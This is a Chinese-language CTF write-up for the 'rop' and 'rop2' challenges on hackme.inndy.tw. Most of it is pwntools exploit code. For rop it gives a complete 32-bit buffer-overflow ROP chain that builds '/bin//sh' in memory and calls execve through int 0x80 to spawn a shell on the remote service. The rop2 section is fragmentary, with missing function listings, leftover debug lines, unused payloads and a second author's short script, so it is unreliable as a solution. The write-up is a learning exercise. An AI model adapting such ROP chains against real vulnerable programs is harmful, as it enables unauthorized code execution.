# rop和rop2的题目的wp

https://hackme.inndy.tw/scoreboard/ 题目很有趣，我做了rop和rop2这两个题目感觉还不错，我把wp分享出来，方便大家学习

rop的要求是：

nc hackme.inndy.tw 7704
Tips: Buffer Overflow, ROP

main函数：

overflow函数：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
from struct import pack
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

raw_input('debug:')

shellcode="/home/flag"
#  print disasm(shellcode)

elf = ELF('/home/h11p/hackme/rop')
offset = 16

#io = process('/home/h11p/hackme/rop')

io = remote('hackme.inndy.tw', 7704)
#bof=0x080488B7

###https://www.slideshare.net/hackstuff/rop-40525248
p = 'A' * offset
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

#debug()
io.sendline(p)
io.interactive()
io.close()

rop2的要求是：

nc hackme.inndy.tw 7703
ROPgadget not working anymore

main函数：

overflow函数：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import time
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

raw_input('debug:')

elf = ELF('/home/h11p/hackme/rop2')

shellcode='/bin//sh'
#shellcode=p32(0x0804847C)
elf = ELF('/home/h11p/hackme/rop2')
offset = 16

io = process('/home/h11p/hackme/rop2')

#io = remote('hackme.inndy.tw', 7703)

debug()
io.recvuntil('Can you solve this?\nGive me your ropchain:')
io.send(shellcode)
io.recvline(timeout=3)

io.interactive()

io.close()


payload = 'a'*16
payload += p32(0x8)

payload2 = 'a'*4 +'b'*4+'c'*4
payload2 += p32(0x0)

payload2 = 'a'*4 +'b'*4+'c'*4
payload2 += p32(0x0)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *
context(log_level = "debug", terminal = ["deepin-terminal", "-x", "sh", "-c"])

elf = ELF("./rop2")

io = process("./rop2")
io.send("/bin/sh\0")
io.interactive()
io.close()


getshell